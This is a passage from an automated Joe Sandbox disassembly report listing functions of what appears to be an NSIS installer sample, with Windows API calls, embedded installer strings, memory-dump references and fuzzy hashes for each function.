                                                                                                                                                                                  • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                                  • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                  • String ID: F
                                                                                                                                                                                  • API String ID: 941294808-1304234792
                                                                                                                                                                                  • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                  • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                  • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                                                                                                  Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                                  • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                                  • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                                  • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                                  • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                                  • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                                  • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                                  • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                                  • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                                  • API String ID: 1641139501-220328614
                                                                                                                                                                                  • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                  • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                  • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                                                                                                                  Function 00406113 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72filestringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                                                                  • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                                                                  • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                                                                  • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                                  • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                  • API String ID: 3734993849-3206598305
                                                                                                                                                                                  • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                  • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                                                                                                                  • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                                                                                                                  Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                                  • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                                  • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                  • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                                  • API String ID: 3294113728-3145124454
                                                                                                                                                                                  • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                                  • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                                  • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                                                                                                                  Function 004023F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                                    • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427DC1,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                                    • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427DC1,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                                    • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427DC1,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                                    • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                                  • `G, xrefs: 0040246E
                                                                                                                                                                                  • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                                  • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                                  • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                                                                                                  • API String ID: 1033533793-4193110038
                                                                                                                                                                                  • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                  • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                                                                                                                  • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                  • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                                                                                                                  Function 0040324C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40timeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                                  • MulDiv.KERNEL32(00012C00,00000064,006F2E64), ref: 00403295
                                                                                                                                                                                  • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                  • String ID: d.o$verifying installer: %d%%
                                                                                                                                                                                  • API String ID: 1451636040-2226171409
                                                                                                                                                                                  • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                  • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                  • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                                                                                                                  Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                                                                  • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                                                                  • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                                                                  • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                                                                  • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2320649405-0
                                                                                                                                                                                  • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                  • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                  • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                                                                                                                  Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                    • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427DC1,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                                    • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427DC1,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                                    • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427DC1,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                                    • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                    • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                    • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                                  • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                                  • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                                  • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                                  • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                                  • API String ID: 2014279497-3433828417
                                                                                                                                                                                  • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                  • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                                                                                                                  Function 0040487A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                                                                  • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.3679776813.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.3679726887.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679836688.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3679897344.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.3680051506.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_A723.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Message$Send$ClientScreen
                                                                                                                                                                                  • String ID: f
                                                                                                                                                                                  • API String ID: 41195575-1993550816
                                                                                                                                                                                  • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                  • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                                                                                                                  • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                                                                                                                  Function 00406064 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                  • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                  • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                  • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
